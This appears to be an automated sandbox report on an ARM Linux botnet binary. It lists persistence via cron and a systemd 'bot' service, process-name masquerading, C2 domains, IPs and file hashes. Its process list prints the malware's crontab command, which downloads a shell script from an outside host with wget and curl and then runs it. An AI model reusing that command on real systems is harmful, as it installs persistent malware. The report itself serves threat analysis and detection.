Analysis Overview
SHA256
3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681
Threat Level: Shows suspicious behavior
The file arm7-20241104-0018.elf was found to be: Shows suspicious behavior.
Malicious Activity Summary
Renames itself
Unexpected DNS network traffic destination
File and Directory Permissions Modification
Modifies systemd
Creates/modifies Cron job
Changes its process name
Command and Scripting Interpreter: Unix Shell
Reads runtime system information
Enumerates kernel/hardware configuration
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-04 00:19
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-04 00:19
Reported
2024-11-04 00:21
Platform
debian9-armhf-20240611-en
Max time kernel
139s
Max time network
145s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sh | N/A |
Renames itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/arm7-20241104-0018.elf | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 5.161.109.23 | N/A | N/A |
| Destination IP | 139.84.165.176 | N/A | N/A |
| Destination IP | 137.220.52.23 | N/A | N/A |
| Destination IP | 152.53.15.127 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.vk0Due | /usr/bin/crontab | N/A |
Modifies systemd
| Description | Indicator | Process | Target |
| File opened for modification | /lib/systemd/system/bot.service | /tmp/arm7-20241104-0018.elf | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | /bin/busybox ntpd | /tmp/arm7-20241104-0018.elf | N/A |
Command and Scripting Interpreter: Unix Shell
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /bin/sh | N/A |
Enumerates kernel/hardware configuration
| Description | Indicator | Process | Target |
| File opened for reading | /sys/fs/kdbus/0-system/bus | /bin/systemctl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/mounts | /tmp/arm7-20241104-0018.elf | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/filesystems | /bin/systemctl | N/A |
| File opened for reading | /proc/self/stat | /bin/systemctl | N/A |
| File opened for reading | /proc/1/environ | /bin/systemctl | N/A |
| File opened for reading | /proc/cmdline | /bin/systemctl | N/A |
Processes
/tmp/arm7-20241104-0018.elf
[/tmp/arm7-20241104-0018.elf]
/bin/sh
[/bin/sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
/bin/sh
[/bin/sh -c /sbin/initctl start bot]
/sbin/initctl
[/sbin/initctl start bot]
/bin/sh
[/bin/sh -c /bin/systemctl enable bot]
/bin/systemctl
[/bin/systemctl enable bot]
Network
| Country | Destination | Domain | Proto |
| US | 5.161.109.23:53 | kingstonwikkerink.dyn | udp |
| IN | 139.84.165.176:53 | kingstonwikkerink.dyn | udp |
| CA | 137.220.52.23:53 | kingstonwikkerink.dyn | udp |
| DE | 152.53.15.127:53 | kingstonwikkerink.dyn | udp |
| HK | 193.233.193.45:21839 | kingstonwikkerink.dyn | tcp |
Files
/var/spool/cron/crontabs/tmp.vk0Due
| MD5 | 6834e3c196a6500f6580688b1dacc988 |
| SHA1 | 195d34d068026784f01fd201c2a31452274b6326 |
| SHA256 | ab36c9cd44fe9af93990e477994623cac5cfa400abf79321d95c524a988ee8db |
| SHA512 | 622319261091b9218d24e9baea929a7008f3f5881d17ae1b1ff3f2669767b4c3a045e80c561a7b3dae9f6cf847e76029ab14a22c592b287e5988122481d7ac83 |
/etc/init/bot.conf
| MD5 | 9722585f219a220a4dc2a0c49bd3b019 |
| SHA1 | ffba476658ea681147c570c6f2b16a79e7d38e19 |
| SHA256 | bb41836a1f2e11795c52739e7434247d90c0f8d391afe759598baa06e3657a8d |
| SHA512 | 77f16a70995a2650a397661d7b9ce3a83f4a5c01dc6ebc5e02b60a41d425246d37ab49478dc38ee3fc956775d90e9c86f911e0ac5e5df6e142bcc82f8601d6e4 |
/lib/systemd/system/bot.service
| MD5 | a4e30f6ce6fb6cf00e133f3c93fb5449 |
| SHA1 | 67b7de93a672ada4abfe11e339dc2e270c61b69d |
| SHA256 | a911f4bb5c69ad831fd6dc9004e52e656a846b2d7cbf152ab80c9b3928062ede |
| SHA512 | 893cda7cdcb75aceef89c64a38004feff8e5867e7bc76c622a49adfbff3fbb2c7916de6165ed4c43b4c7dabb5b56271e5a1b8a08d02b84389da92ec177289c25 |